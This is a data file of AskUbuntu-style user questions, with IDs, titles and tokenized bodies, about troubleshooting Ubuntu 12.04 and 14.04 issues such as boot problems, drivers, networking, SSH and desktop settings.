483633	slow hard disk ubunto 14.04 ext4 on thinkpad dual boot	ext4 - is it slower ? have a thinkpad with 8gb drive , 4 processors . intel® core™ i3-3110m cpu @ 2.40ghz × 4 . ubuntu 14.04 lts with updates applied . file reading is very slow . ide sts hangs when a small project with 10-15 files are loaded . similarly default text editor gedit also 'hangs ' when more than 10-15 files open . monitor says 40 % of 7.4 available ram is unused sudo df -l filesystem 1k-blocks used available use % mounted on /dev/sda6 107971568 47364312 55099572 47 % / none 4 0 4 0 % /sys/fs/cgroup udev 3858348 4 3858344 1 % /dev tmpfs 773824 1208 772616 1 % /run none 5120 0 5120 0 % /run/lock none 3869104 31592 3837512 1 % /run/shm none 102400 56 102344 1 % /run/user system is dual boot with windows . default is ubuntu . other empirical evidence - a certain software that talks to mysql and inits its data base - 35 minutes in windows and 2 hours on ubuntu same computer ( dont it 10 times on 3 laptops - do it everytime another developer makes enough changes to db ddl and our app ) . latest mysql on both installed in april 2014 . few of the devs have macs , those take 15 minutes . what can i do to speed up my ubunto ? already looking at putting db on ram ( after init will copy from ram to disk db and vice versa ) but that wont help ide and text editing . free total used free shared buffers cached mem : 7738212 6417952 1320260 642728 532424 2991044 -/+ buffers/cache : 2894484 4843728 swap : 15998972 0 15998972
483636	installing 32-bit wine 1.7.19 on 64-bit ubuntu 14.04	i 'm having a bad time trying to install 32-bit version of wine 1.7.19 on a 64-bit version of ubuntu 14.04 . i 've got through all the questions related to that on askubuntu but i have n't found a working solution probably because i did a big mess with wine ( tried to compile/install it in many ways , winetricks wo n't work until i use ent wine= '' path '' winetricks , etc ) . i would like to make a cleanup of everything that 's related to wine ( and its components like winetricks ) and perform a clean install . i tried to install wine through the software center but there 's only an old version of wine , then i uninstalled it with software center as well . then i used this tutorial to compile wine : http : //www.noobslab.com/2014/05/winehq-updated-to-version-1719-install.html - i compiled it in `` /home/kamil/pobrane/wine-1.7.19 '' but it made a 64-bit version of wine . so basically i have two questions : how do i clean all traces of wine to perform a clean install ? how do i install/compile a 32-bit version of wine 1.7.19 ?
483637	canon mg3100 series printer asking for authentication	i have set-up a canon mg3150 printer on my ubuntu machine , using usb . it seems to detect it fine , but when i try to print it asks for authentication . i have n't set up any security measures on the printer ( not purposefully at least ) , so i have no idea why it is asking for this ? moreover , the manual is an executable , so i am having difficulty accessing this , so i ca n't even work out how to do a factory reset . if anyone has any ideas i would be very appreciative .
483639	syslog error message eating up my hd with wireless message	i received a message that i ran out of space on my hard drive , so i deleted a few things , large games i never played , etc , a few hours later , i got the same message , so i deleted a few more large things , and without doing anything , i was rapidly running out of hd space . i finally tracked the problem down to a 16 gb syslog file and an 11 gb syslog.1 file . i opened it up and got this repeating message : jun 12 17:32:35 adam-ep35-ds3l networkmanager [ 944 ] : dbus_g_proxy_cancel_call : assertion 'pending ! = null ' failed jun 12 17:32:35 adam-ep35-ds3l networkmanager [ 944 ] : < info > ( wlan0 ) : supplicant interface state : starting - > down jun 12 17:32:35 adam-ep35-ds3l networkmanager [ 944 ] : < warn > trying to remove a non-existant call id . jun 12 17:32:35 adam-ep35-ds3l wpa_supplicant [ 1064 ] : nl80211 : driver does not support authentication/association or connect commands jun 12 17:32:35 adam-ep35-ds3l wpa_supplicant [ 1064 ] : could not set interface wlan0 flags ( up ) : can not assign requested address jun 12 17:32:35 adam-ep35-ds3l wpa_supplicant [ 1064 ] : wext : could not set interface 'wlan0 ' up jun 12 17:32:35 adam-ep35-ds3l wpa_supplicant [ 1064 ] : wlan0 : failed to initialize driver interface jun 12 17:32:35 adam-ep35-ds3l networkmanager [ 944 ] : < error > [ 1402608755.122976 ] [ nm-supplicant-interface.c:997 ] interface_add_cb ( ) : ( wlan0 ) : error adding interface : wpa_supplicant could n't grab this interface . jun 12 17:32:35 adam-ep35-ds3l networkmanager [ 944 ] : dbus_g_proxy_cancel_call : assertion 'pending ! = null ' failed jun 12 17:32:35 adam-ep35-ds3l networkmanager [ 944 ] : < info > ( wlan0 ) : supplicant interface state : starting - > down jun 12 17:32:35 adam-ep35-ds3l networkmanager [ 944 ] : < warn > trying to remove a non-existant call id . jun 12 17:32:35 adam-ep35-ds3l wpa_supplicant [ 1064 ] : nl80211 : driver does not support authentication/association or connect commands jun 12 17:32:35 adam-ep35-ds3l wpa_supplicant [ 1064 ] : could not set interface wlan0 flags ( up ) : can not assign requested address jun 12 17:32:35 adam-ep35-ds3l wpa_supplicant [ 1064 ] : wext : could not set interface 'wlan0 ' up jun 12 17:32:35 adam-ep35-ds3l wpa_supplicant [ 1064 ] : wlan0 : failed to initialize driver interface jun 12 17:32:35 adam-ep35-ds3l networkmanager [ 944 ] : < error > [ 1402608755.123542 ] [ nm-supplicant-interface.c:997 ] interface_add_cb ( ) : ( wlan0 ) : error adding interface : wpa_supplicant could n't grab this interface . jun 12 17:32:35 adam-ep35-ds3l networkmanager [ 944 ] : dbus_g_proxy_cancel_call : assertion 'pending ! = null ' failed jun 12 17:32:35 adam-ep35-ds3l networkmanager [ 944 ] : < info > ( wlan0 ) : supplicant interface state : starting - > down jun 12 17:32:35 adam-ep35-ds3l networkmanager [ 944 ] : < warn > trying to remove a non-existant call id . jun 12 17:32:35 adam-ep35-ds3l wpa_supplicant [ 1064 ] : nl80211 : driver does not support authentication/association or connect commands jun 12 17:32:35 adam-ep35-ds3l wpa_supplicant [ 1064 ] : could not set interface wlan0 flags ( up ) : can not assign requested address jun 12 17:32:35 adam-ep35-ds3l wpa_supplicant [ 1064 ] : wext : could not set interface 'wlan0 ' up jun 12 17:32:35 adam-ep35-ds3l wpa_supplicant [ 1064 ] : wlan0 : failed to initialize driver interface jun 12 17:32:35 adam-ep35-ds3l networkmanager [ 944 ] : < error > [ 1402608755.124093 ] [ nm-supplicant-interface.c:997 ] interface_add_cb ( ) : ( wlan0 ) : error adding interface : wpa_supplicant could n't grab this interface . any idea how to solve this ? fyi , although i 've used ubuntu for a little while now , i 'm still a noob , so please be detailed .
483641	separate partition or device to store data in case of o/s reload	i 'm new to ubuntu 14.04 . i am trying to set up a separate partition for my media files , so that if i have to re-load the o/s , i do n't lose the data files . last time i reloaded i lost everything even though i thought i had moved data to a safe place . can someone explain how a partition in linux is different from a drive in windows ? i think i am trying to replicate the concept of separate drive space on a hard drive in windows . i 've created a separate partition , mounted as /home , but as far as i can tell , it 's still within the root partition / , and on sda . i 'd expect this space to show up as a separate device , unique for computer . do i need to create a new virtual device , sdb ? if so , how ? also , can someone explain mounting and mount points ( no jokes please ) ? using gparted from the install disk , i tried to create a separate partition and mount it as /media , but that only generated an error message that prevented the install . is what i am trying to do best done at the time of install ( i.e . `` do something else '' ) or afterwards by using gparted on the install disk to shrink main partition and create new space from unused space ? i have tried to resolve this from previous answers , but do n't seem to get to what i need . thanks , ian
483644	is there a command that detects if the cd drawer is open or closed ?	is there a command that you can run in a shell script that would detect if the cd tray is open or closed , and return 1 or 0 depending on whether it was ( or something easy to interpret ) ? currently , i am executing the open command , and timing how long it takes to execute . if it is almost instant , it is open . if it takes time , it was open and is now closed . i would like a method that does n't involve changing the current state - just detecting it .
483645	kernel panic installing from usb stick and pxe ( very old fujitsu lifebook b2154 )	i 'm trying to resuscitate an old fujitsu b2154 with touch screen . it only can boot using floppy disk or pxe . does not recognize external cdrom/dvd and will never boot using usb stick . i tried too many flavours and forks of ubuntu ( ubuntu , kubuntu , lubuntu , xubuntu , puppy , mint , and others ) and too many versions from 8.04 to 14.04. i create the usb installer with lili , unetbootin o others and a floppy with plop boot manager . when i try to boot live or install , i get a kernel panic . i tried to boot using pxe , and boots fine , it also starts installing , but suddenly i get a message saying that some .deb files were not found . in fact , the .deb files are in the usb drive and the /tftboot/imagecdrom ... when i try to boot live cd 's i get a kernel panic . curiously , i can boot all the puppy versions to the gui , but when i install , it does not install all the files with the full installation . what i am doing wrong ?
483649	no edid whatsoever , how can i force output ?	so i 'm trying to get xbmcbuntu to talk to my tv , unfortunately my gpu ( 8800gts ) does n't talk to the tv , it thinks it 's disconnected ( no edid info at all ) . so far i 've got it to output to the tv but ca n't get any resolution apart from 800x600 . xorg.0.log says : ( ww ) nvidia ( 0 ) : unable to validate any modes ; falling back to the default mode the xorg.conf and a part of the log is pastebinned here . sorry about the mess , after 6 or so hours on this i just tried the scatter gun approach putting in any option i could find . i 'm at my wits end , at one stage i had 1920x1080 by starting it with a monitor attached and switching to the tv . unfortunately that 's too high a resolution and i do n't want to cart the monitor around every time i turn my media server on . edit : sudo get-edid | parse-edid gives this .
483654	updating ftp library	i 've installed curlftpfs to mount ftp resources on my local ubuntu desktop 14.04 system using fstab : curlftpfs # user : password @ ip : port/ /mount-point fuse noauto , user , uid=1000 , gid=1000 , umask=0022 , ftp_method=singlecwd 0 0 it works ok , except that the network performances are extremely poor . i have been cautious about the options to make sure that only one cwd is done on the full target directory instead of one cwd per each folder as described in the man entry ( ftp_method=singlecwd ) . that precaution does not solve this issue . i have snooped around the network traffic and noticed that many tcp resets are probably the cause of this problem . now i 'm trying to locate which dependency handles ip/tcp traffic to be able to update it with a more recent version . any suggestion ?
483655	not able to login using ctl alt f1- keyboard stops working - after no graphics screen - after graphics driver update	i had installed ubuntu 12.04 on my desktop . it was running fine but when i realized that i was not using my graphics card to its fullest . ( ignorance is bliss ! ) after i installed the graphics driver for nvidia and rebooted , i am not able to login again . ( either through gui or through other means ) first , i see the following error the disk drive for /dev/mapper/cryptswap1 is not ready yet or not present continue to wait ; or press s to skip mounting or m for manual recovery there are many solutions related to swap partitions , prerequisite is to login through backdoor ( using either ctrl + alt + f1 or ctrl + alt + t ( yes , i know that i can also use f2 to f6 ) if somehow i am able to see the login name entry , it disappears within a moment and after that keyboard does not work at all . even numlock does not make the green light on . before that the message printed on screen is mountall : plymouth command failed mountall : disconnected from plymouth when i searched have found many solutions to above problem also , but anyways it requires us to be possibly there are persons like me who had suffered earlier because of this and have not got any answer . the question here is the nearest to mine , any inputs on getting my keyboard work ?
483658	move application icons on the right side of the top panel in trusty ?	is there a way to move the application icon to the right side of the top panel ( next to the wi-fi one ) ? right-clicking does n't activate any menus ( tried super/alt/ctrl/shift right-click - no difference ) no other application is shown as an icon on the top panel besides hipchat
483659	running a python program from ubuntu 's 14.04 gui	i would like to launch a terminal window and run a python program , but 14.04 does not seem to have the ability to do so like some older versions . i would like to click on an icon and it start a terminal window and run python program.py ( with some arguments here ) . any ideas ? thanks .
483663	unity dash slow or no results	in my ubuntu i use the dash to be able to search my apps . i hit super and it keep searching but no results , close the dash , super , no results and so on until it finally starts showing results . sometimes , i have to restart my ubuntu or log out my session . but with gnome shell , the search starts instantly no delays , no restarts . how can i fix this behaviour and make my results show instantly ? i have searched askubuntu before posting this question . i have tired : unity -- reset but it is deprecated !
483667	wireless drivers for d-link dwa-182	just wondering if any drivers are out there for d-link dwa-182 wireless adapter for ubuntu 12.04 lts ?
483668	stuck after login	i upgraded from 13.10 to 14.04 with the official upgrade tool . everything worked fine , until i rebooted . i type in my password , my wallpaper and cursor is shown , but nothing happens ( it 's stuck ) . then i reinstalled my system from scratch . everything worked fine , a couple of hours and reboots later , it 's broken again , the same way . tried unity-tweak-tool -- reset-unity , but i get these warnings/errors : warning : no display variable set , setting it to :0 ( unity-tweak-tool:3487 ) : dconf-warning ** : failed to commit changes to dconf : can not autolaunch d-bus without x11 $ display also tried the suggestion from here . after running ccsm , i get this output : no protocol specified /usr/lib/python2.7/dist-packages/gtk-2.0/gtk/__init__.py:57 : gtkwarning : could not open display warnings.warn ( str ( e ) , _gtk.warning ) traceback ( most recent call last ) : file `` /usr/bin/ccsm '' , line 94 , in < module > import ccm file `` /usr/lib/python2.7/dist-packages/ccm/__init__.py '' , line 1 , in < module > from ccm.conflicts import * file `` /usr/lib/python2.7/dist-packages/ccm/conflicts.py '' , line 26 , in < module > from ccm.constants import * file `` /usr/lib/python2.7/dist-packages/ccm/constants.py '' , line 30 , in < module > currentscreennum = gtk.gdk.display_get_default ( ) .get_default_screen ( ) .get_number ( ) attributeerror : 'nonetype ' object has no attribute 'get_default_screen' do n't know if it 's relevant , i 'm using the proprietary nvidia driver ( version 331.79 ) , and i have 2 monitors .
483669	how to create gui for embedded systems	i need to create a gui for a program that i will build to run in a minimal version of linux in an embedded system that i am making . not sure if i 'm going with arm or small factor x86 architecture and maybe the answer to this post will help me decide . i found altia ( url : altia.com ) but they dont provide the framework to personal projects . is there any other alternative , that i can use , to create a beautiful gui for programs , oriented to low resources systems such embedded solutions ? thanks in advance
483670	what causes ssh problems after rebooting a 14.04 server ?	why does rebooting a server running ubuntu 14.04 give me 'connection refused ' errors ? i see ssh : connect to host < ip-address-here > port 22 : connection refused but only for 14.04 and only after rebooting . i 'm using 12.04 desktop at home . how do i troubleshoot this ? to make the question clearer , here 's what does or does not work for me : ssh into a fresh install of 12.04 > logout > ssh in again > works ssh into a fresh install of 12.04 > reboot > ssh in again > works ssh into a fresh install of 14.04 > logout > ssh in again > works ssh into a fresh install of 14.04 > reboot > ssh in again > connection refused the problem i 'm having is unique to 14.04 , and only happens after rebooting . i have several servers running 12.04 prior to this and everything still works perfectly . i 've got a new server i want to use 14.04 on and i want to understand what is going wrong . any suggestions ? here 's what i 've tried so far : sudo traceroute -p 22 -t < ip-address-here > traceroute works fine , i get a response from the server on ssh port 22. initctl list ... ssh start/running , process 23371 ... looks like ssh on the 14.04 server is set to start at boot ( as expected ) . tom @ desktop : ~ $ ssh -vvv root @ < ip-address-here > openssh_5.9p1 debian-5ubuntu1.4 , openssl 1.0.1 14 mar 2012 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug2 : ssh_connect : needpriv 0 debug1 : connecting to < ip-address-here > [ < ip-address-here > ] port 22. debug1 : connect to address < ip-address-here > port 22 : connection refused ssh : connect to host < ip-address-here > port 22 : connection refused edit : here is the entire syslog from a freshly created machine . i created it , ssh 'd in & issued reboot now command , then got a connection refused error after waiting for it to reboot and trying to ssh in the second time . hard reboot via hosting control panel and now ssh connection works again .
483671	how to not preserve file permissions when copying files with `cp` ?	i feel that the behavior of cp has changed . earlier without the '-a ' option the file permissions were reset to default , but not now : $ ls -l /media/il/megafon\ modem/autorun.inf -r -- -- -- -- 1 il il 45 авг . 18 2012 /media/il/megafon modem/autorun.inf $ cp /media/il/megafon\ modem/autorun.inf ~ $ ls -l ~/autorun.inf -r -- -- -- -- 1 il il 45 jun 15 18:43 /home/il/autorun.inf $ umask 0002
483675	graphics card issues ?	i have an intel gpu and i think that the catalyst gpu is amd . however , i would like to install the latest drivers for this , but am having trouble as i can not find out which driver i have to install . i wanted to play halo ce but there were screen issues . my frind said it had something to do with the catalyst gpu drivers not being up to date . so any ideas on how to find out my catalyst gpu type ? ( hp pavilion g6 ) . all help is much appreciated !
483676	how to connect to openvpn from 14.04 ?	i have set up an openvpn connection via the network manager , but the connection is failing . when i try the connection from the command line i get the following error : sudo openvpn -- config /etc/networkmanager/system-connections/myvpn-1234567890 options error : unrecognized option or missing parameter ( s ) in /etc/networkmanager /system-connections/myvpn-1234567890:1 : [ connection ] ( 2.3.2 ) use -- help for more information . it looks like [ connection ] is not a standard setting for openvpn , but is required by network manager . if i want to be able to connect using the network manager dropdown , what can i do ? ( for example , if i remove the connection section , will network manager still recognise the connection ? )
483678	network do not work on 14.04	i have windows vista and ubuntu 14.04 dual booted with dvd iso and it works very well , but there is a problem with ethernet connection . on windows it works well , but on ubuntu it gives an error message . is a closed network connection
483679	how to get ubuntu to stream to bose soundtouch ?	we got here a bose soundtouch connected in the local network . we can play music from the ipad via airplay , but i could not find a way to stream audio from my ubuntu pc . i tried using stream2ip with the port 5000 of the soundtouch or tunning the clementine gstreammer to direct the audio to the apple airport express audio sink without success . has anyone been able to stream to theirs bose soundtouch and can give some advice ?
483684	problems installing ubuntu alongside windows 7	i 'm attempting to install ubuntu from a live usb , however it gives me the following error : error installing /cdrom//pool/main/c/console-setup/console-setup-linux_1.88_all.c trying to overwrite '/etc/console-setup/compose.iso-8859-13.inc ' , which is also in package console-setup 1.88 . i have already tried to recreate the live usb . the system previously held a ubuntu 12.04 installation . is there any way around this ? edit : it seems that the new installation also damaged the other partitions as i now get > `error : no such device : 83327c9 [ long code ] ` entering rescue mode ... grub rescue > when trying to restart ( rather than the `` choose a boot '' ) . however the ubuntu installation just started with no problems . and opening the grub rescue , is there any way to restore my windows 7 boot as well as my old ubuntu 12.04 ?
483685	can not find the iso file on my computer	your help greatly appreciated . i have downloaded pendrivelinux usb installer and downloaded the ubuntu iso file which is 900 or so mbs ... however when i browse from pendrivelinux usb installer i can only 'see ' my mp3 files etc. , iso file does n't appear . the browser says `` iso file '' i have tried to change it to 'all files ' bit it does n't , and i checked the iso file to say 'unblock ' but it still does n't appear so i can not select it . i have looked on here and online for answers but no-one mentions this . hopefully someone here has an idea . i 'm so excited to put this operating system on my notebook . thank you for your help , - jamie
483687	editing gsettings unsuccesful when initiated from cron	i must have a blind spot , but i can not find what it is . i made a small python script that removes vlc from the sound menu . it runs perfectly in any way i run it from the terminal or from a launcher or whatever you can think of . what the script actually does is nothing more than get the get the current settings : gsettings get com.canonical.indicator.sound interested-media-players edit the list , and set the changed list by : gsettings set com.canonical.indicator.sound interested-media-players `` [ 'newlist ' ] '' these commands are executed by a python script , . however , when run from a cronjob ( crontab -e ) only the gsettings - get - part works , but not the gsettings - set - section . that the get section works fine with cron , i checked by making the script write data ( the original as well as the edited ) to an external file . not a python problem to see if the problem is related to python code , i created a bash script that applies a changed sound menu items list . the story is the same : the bash script runs fine from the command line or a launcher , not from cron , while any other command in the same script would run fine . also , if i add any command at the end of the script below , it works fine and it looks like the script is satisfied with its own work . why is the gsettings set command not working when initiated from cron ? this is the script : # ! /usr/bin/python3 import subprocess def read_soundmenu ( ) : # read the current launcher contents get_menuitems = subprocess.popen ( [ `` gsettings '' , `` get '' , `` com.canonical.indicator.sound '' , `` interested-media-players '' ] , stdout=subprocess.pipe ) return eval ( ( get_menuitems.communicate ( ) [ 0 ] .decode ( `` utf-8 '' ) ) ) def set_current_menu ( current_list ) : # this takes no effect from cron # preparing subprocess command string current_list = str ( current_list ) .replace ( `` , `` , `` , '' ) subprocess.popen ( [ `` gsettings '' , `` set '' , `` com.canonical.indicator.sound '' , `` interested-media-players '' , current_list , ] ) current_list = read_soundmenu ( ) for item in current_list : if item == `` vlc.desktop '' : current_list.remove ( item ) set_current_menu ( current_list )
483690	usb audo speakers : only one speaker enabled until i change volume with alsamixer	when plugging in my usb speakers , only one of them gets enabled ( sound only comes out of one ) until i open console , alsamixer , select the usb speakers and change volume on them . then both speaker have sound output . also it does not happen everytime . i 'm not quite sure , but it 's seems that the first time after booting that this happens . once i set the volume in alsamixer , unplugging and replugging is no problem . any hint how i could solve this ?
483691	thunar , open in terminal does not work in sftp or ftp	thunar has `` open terminal here '' option just like nautilus when you install `` nautilus-open-terminal '' package . my problem is it does not work when i connect to sftp . i need this very often . how do i enable it ? using ubuntustudio 14.04 .
483693	how to run a custom command for any x session	i need to patch the gamma on my monitor that is really out of balance , in short i need to run a command like xgamma -gamma 1.2 for any x session that i might start on my machine . my problem is that ubuntu uses a different startup technology ( upstart ) and i 'm not sure where i 'm supposed to write this command for my x sessions . keep in mind that i need to run this only if an x sessions starts , not everytime at the boot .
483694	autologin questions	i have set up a batch of workstations at a library using drbl . these workstations are running ubuntu 14.04 . i want these workstations to autologin to a specific user ( a different one for each workstation , since the /home file system is nfs mounted ) . i have a custom copy of /etc/lightdm/lightdm.conf for each workstation and i have set autologin-user-timeout=30 and autologin-user=workstationuser ( different for each workstation ) . this mostly works , but there are some 'weirdnesses ' i would like to resolve . doing a shutdown from the gear menu and then restarting the machine does not always log the user in . sometimes it behaves like the user 'locked ' the screen and it is expecting to unlock a running session . i want a shutdown to imply a full logout ( it is too much to ask the library staff people to logout and then shutdown ) . always . these are guest accounts , so there is never a session to save ( screen locking is also disabled ) . doing a logout from the gear menu brings up the list of all possible users . this is ok ( sometimes someone wants or need to login as a 'real ' user ) . but if the login screen is left alone and/or after the 'real ' user logs out , it does not automagically re-login to the autologin-user . what do i need to do to fix this ? i am not very experienced with ubuntu -- i am an old hand with centos and redhat .
483697	archive format with index table that preserves executable bit ?	the title basically sums it up . i like how zip is fast ( basically you can instantly open it and look what 's inside ) , but i need to keep executable flag for files , like tar.gz does . is there any archive format that 'd combine those two features ?
483698	every time ubuntu need usb drive to run	i am new to the ubuntu . i have installed the ubuntu 12.04 from the usb drive . but it needs the usb drive every time to open and run . please suggest me a solution to overcome .
483699	how to run a single thread 7z benchmarking using the command line ?	i can run `` 7z -b '' for multi threading benchmark and compare results between platforms such as windows and linux . but how to compare single thread 7z benchmark on ubuntu ? : ) i found no documentation in 7z -h and http : //manpages.ubuntu.com/manpages/trusty/man1/7z.1.html about restricting 7z -b to run only in single thread . i would love to compare the results with windows just for checking the intel haswell turbo boost performance whether is working or not on ubuntu 14.04 lts . thanks in advanced . : )
483707	14.04 touchpad is too sensitive	my touchpad is way too sensitive . while writing , the cursor jumps suddenly to the place the mouse cursor is sitting . i am not even touching the touchpad ! i had the same problem with 12.04 and recently did an upgrade to 14.04 , which did n't solve the problem . in the mouse-and-touchpad settings , there are only settings for a mouse , not a touchpad . i have tried this : sudo apt-get install gsynaptics gpointing-device-settings which did n't help . then i found this which might describe my problem . but i get stuck halfway through . when putting this in the terminal : ( add the patch to the psmouse module : ) sudo dkms add -m psmouse -v elantech-v6 i get this : error ! could not find module source directory . directory : /usr/src/psmouse-elantech-v6 does not exist . can anyone help ?
483708	usb install just shows a black screen	i have extracted my ubuntu .iso onto a usb device using the instructions on here ( https : //help.ubuntu.com/community/installation/fromusbstickquick ) . when i boot onto the usb drive i get a menu with gnu grub version 2.02^beta2-9 on the top . there is four options saying ; try ubuntu without installing install ubuntu oem install ( for manufacturers ) check disc for defects then at the bottom it says use the up and down keys to select which entry is highlighted . press enter to boot the selected os . 'e ' to edit the commands before booting or 'c ' for a command-line . esc to return to previous menu . when i select any of the four options it just goes to a black screen . then i reboot . i ca n't seem to find anybody else with the same problem , is there a fix ? ( ubuntu 14.04 lts )
483710	ubuntu 14.04 - top right sound screen icon , greyed and not working	i can hear rythmbox songs and internet videos perfectly , but my screen sound icon is always greyed and muted , and i can not use it for turn up and down sound volume ... any advice would be of great help . thanks in advance .
483711	how to share wifi over proxy ?	in my computer i have a ssh tunnel and socks5 proxy has been set up for my browsers , and thus all browsing traffics are passed through the proxy . now i want to create a wireless hotspot for other computers in the range . how can i setup this hotspot through the socks proxy ? when other computers use this hotspot , the traffic goes through the ssh tunnel set on the core computer . in ubuntu , it is very simple to create a hotspot , but proxy can not be set for its traffic . i think there should be a program to create a hotspot with proxy .
483712	upgrading to bluez 5.19 from source	i 've successfully compiled bluez 5.19 from source using ./config and then make , but i 'm stuck on the next step . make install does n't seem to overwrite the old bluez ( when checked with dpkg -l , it still reports bluez 4.1 even after a restart ) . so , i thought uninstalling bluez and then doing make install would work , but i discovered i ca n't apt-get remove or apt-get purge bluez without uninstalling a bunch of other extremely important packages ( such as ubuntu-desktop ) . re-installing these packages shoves the old 4.1 bluez back in whether i want it to or not . what should i do in order to use bluez 5.19 on my system ? ( my goal is to pair my wii u pro controller and a newer generation wii remote with my computer , and according to what i 've read , the new version of bluez will accomplish this for me ) . thanks in advance .
483713	ubuntu 12.04 lts + no sound without headhones/speakers	i am running ubuntu 12.04 lts for last one year ( dell vostro 2520 ) . few months later , i could not hear songs or any other sound . however , if i use a headphone or use an external speaker , the sound comes nicely . can you please tell me if this is an issue for which i need to contact the dell people ? or , there is some software problem that can be fixed through some commands in the terminal ? any help is appreciated . -kolahal
483715	how to output sound on freebox server/player ?	the french internet provider free is providing airplay support for its two boxes ( http : //www.free.fr/adsl/freebox-revolution.html ) the player and the server . by airplay i mean here , a way to output sound on either the server or the player from a computer using the local network . the big picture of it works is not very clear to me , but it seems the protocol stack implemented on the boxes is the apple protocol ( are there deals between the 2 companies , or is this protocol open , i do n't know ? ) anyway , using itunes either on mac or on windows one can easily output the music being played on the server or on the player by just choosing where to output the sound from a menu entry . it just work . from ubuntu software repositories , i installed pulseaudio-module-raop and i am now able to see my player and my server in the output list of the sound menu . nevertheless , any of these two entry is working , no sound is outputed and my banshee starts to play song very very quickly . after digging into this problem if my understanding is correct , it seems that the protocol version implemented by the free boxes is a newer one that is not supported by pulsaudio . i tried the following pulseaudio patch without success : http : //hfujita.github.io/pulseaudio-raop2/ so my question is , does someone succeded into outputing sound from ubuntu to a free equipement using airplay ? if yes , of course i am intersted in knowing how ? update : a screenshot of the output tab of the sound configuration panel showing that my two free devices are discovered . selecting any one of this output does n't work and in banshee for example when these outputs are selected music is played 5 time faster than normal time .
483717	how do i rebuild mesa with llvm 3.5 from source ?	current llvm 3.4.1 from ubuntu repo gives a lot of issues with many apps ( llvm spinning bug etc ) and without llvm 3.5 latest mesa from git lacks some features . at the moment i 'm using https : //launchpad.net/~oibaf/+archive/graphics-drivers for latest mesa git , but packages from there are still using llvm 3.4.1 . how can i rebuild those packages with llvm 3.5 ( which can be found in ubuntu repos ) ?
483719	i ca n't connect openvpn automatically as soon as my wifi is connected in ubuntu 14.04	i see an option in ubuntu 14.04 network manager that i can connect to vpn automatically as soon as a wireless connection is connected . for some reason , i ca n't make it work . it just tries to connect and connect but it 's always unsuccessful . my wireless connection is able to connect only when the vpn was not set automatically . please help ?
483723	mouse spazzes out in the top right corner on ubuntu 14.04	whenever i boot into ubuntu 14.04 , my mouse goes into the top right corner , and whenever i try to move it , it spazzes out . i ca n't do anything with my mouse . i tried using my microsoft touch mouse and a wired hp mouse . none of them worked ... any help ?
483725	make usb bootable , but install ubuntu on hardrive	i remember something from my past ( may be 10 years back ) . i have heard that we can boot an os from floppy disk but the os files will be in hard disk . correct me if i am wrong , i do n't know whom to ask , so posting it here . my question : i have a hard disk which is dynamic drive , i searched and found that grub will not start from a dynamic drive , so its of no use to install ubuntu into dynamic drive because it wont start . so my plan is , can i install ubuntu in to dynamic drive , but i boot that from a static/logical usb devices ? if this is possible , can someone help me try this ? note : i do n't want to format everything and repartition drive into static/logical
483728	ca n't boot ubuntu boot repair giving error	i have a hp sleekbook . which has windows 8 pre-installed . i installed ubuntu in a new partition using usb disk . now the problem is i ca n't dual boot . i ca n't boot into my ubuntu . i made another bootable usb of boot-repair . it repaired and gave an error with a summary pasted at how can i boot into ubuntu ?
483729	how to remove countdown in grub menu ( disable countdown )	i have a dual boot ubuntu and windows 8 . ubuntu is default os to start up and countdown select the default os to boot if i do n't change that before . when i order between ubuntu and windows 8 countdown automatically hide and then , i have to press enter to boot from any highlighted os without time limit.my question is : how can i disable countdown for always and i select which os starts up with using up/down arrow key myself and until i do n't select and do n't pressing enter , that freeze on grub menu . any ideas would be my pleasure note : there is no /etc/default/grub file in my ubuntu . edit : i reinstalled grub ( sudo apt-get -- reinstall install grub2 grub-pc ) and now i have a/etc/default/grub file but the countdown did not stop with this changes : # if you change this file , run 'update-grub ' afterwards to update # /boot/grub/grub.cfg . # for full documentation of the options in this file , see : # info -f grub -n 'simple configuration' grub_default=0 grub_hidden_timeout=0 grub_hidden_timeout_quiet=true grub_timeout= '' -1 '' grub_distributor=`lsb_release -i -s 2 > /dev/null || echo debian` grub_cmdline_linux_default= '' quiet splash '' grub_cmdline_linux= '' '' # uncomment to enable badram filtering , modify to suit your needs # this works with linux ( no patch required ) and with any kernel that obtains # the memory map information from grub ( gnu mach , kernel of freebsd ... ) # grub_badram= '' 0x01234567,0xfefefefe,0x89abcdef,0xefefefef '' # uncomment to disable graphical terminal ( grub-pc only ) # grub_terminal=console # the resolution used on graphical terminal # note that you can use only modes which your graphic card supports via vbe # you can see them in real grub with the command `vbeinfo' # grub_gfxmode=640x480 # uncomment if you do n't want grub to pass `` root=uuid=xxx '' parameter to linux # grub_disable_linux_uuid=true # uncomment to disable generation of recovery mode menu entries # grub_disable_recovery= '' true '' # uncomment to get a beep at grub start # grub_init_tune= '' 480 440 1 '' i delete double quote grub_timeout= '' -1 '' around -1 which is automatically added to it and save then running sudo update-grub i get the following warning : warning : setting grub_timeout to a non-zero value when grub_hidden_timeout is set is no longer supporte
483731	ubuntu 14.04 desktop lost open app windows after waking up from the sleep mode	i am new to ubuntu desktop but have used windows and mac for a long time . i also have good experience with linux . i need some help on how to recover the lost app windows . i have been quite impressed by ubuntu desktop so far until i run into this problem . i use ubuntu 14.04 desktop on a toshiba laptop with an external monitor . i use chrome browser and terminal apps frequently to develop software . i need to keep these app windows open for several days . i put the laptop into sleep mode between work sessions . i often find some open windows are lost after waking up the laptop from the sleep mode . for example , i use chrome browser to research topics . after waking up the laptop , i can not find the chrome window anymore . i can open a new chrome window from the chrome icon on the launcher . after that , if i click the chrome icon on the launcher again , i can see both chrome windows . but i can not choose the old one . this happens to both chrome and terminal apps so far . can someone give me pointers on what i might have done wrong ? thanks .
483742	how do i get adobe reader to work in ubuntu 14.04 ?	i downloaded adobe reader from here : http : //get.adobe.com/reader/ by default , it recognizes my system as linux and lets me download a .bin file which turns out to be an executable installer . there are no installation instructions at all ( shame on adobe ) but it was pretty easy to figure out i had to add execution permissions to the file and run it as root . it installed adobe reader under /opt . now i have a beautiful adobe reader icon on the desktop which does nothing when double clicked . nothing ( not even an error message ) . also , if i write `` adobe '' in the dash , the same icon shows up , and it still does nothing . by right-clicking on a pdf file 's icon on the desktop or in nautilus , there 's no `` open in adobe reader '' option either . is there a non-broken adobe reader available for ubuntu ? where do i get it ?
